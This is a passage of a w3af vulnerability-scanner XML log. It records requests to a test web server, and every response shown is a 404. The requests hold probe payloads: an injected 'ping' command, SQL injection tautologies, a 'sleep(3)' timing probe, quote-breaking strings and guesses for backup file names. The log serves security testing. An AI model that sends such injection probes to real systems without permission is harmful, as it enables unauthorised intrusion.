                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/cake.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="381">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/k5ql1%3C%2F-%3Ek5ql1%2F%2Ak5ql1%22k5ql1k5ql1%27k5ql1k5ql1%60k5ql1k5ql1+%3D HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about k5ql1%3C%2F-%3Ek5ql1%2F%2Ak5ql1%22k5ql1k5ql1%27k5ql1k5ql1%60k5ql1k5ql1+%3D has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='k5ql1%3C%2F-%3Ek5ql1%2F%2Ak5ql1%22k5ql1k5ql1%27k5ql1k5ql1%60k5ql1k5ql1+%3D'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="385">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="387">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/70%22+OR+%2270%22%3D%2270 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 70%22+OR+%2270%22%3D%2270 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='70%22+OR+%2270%22%3D%2270'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="389">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/sleep%283%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about sleep%283%29%3B has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='sleep%283%29%3B'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="406">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/70%22+AND+%2270%22%3D%2271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 70%22+AND+%2270%22%3D%2271 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='70%22+AND+%2270%22%3D%2271'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="423">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/d%27z%270 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27z%270 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27z%270'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="425">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/d%27z%220 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27z%220 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27z%220'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="426">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="427">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="428">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute~ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about choucroute~ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='choucroute~'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="429">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="430">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%3C%21-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3C%21-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3C%21--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="431">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="432">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="433">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="434">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="436">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.class HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="437">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="439">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="440">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.inc HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="441">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.jar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="442">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.java HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/choucroute" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/choucroute.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="444">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/choucroute.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
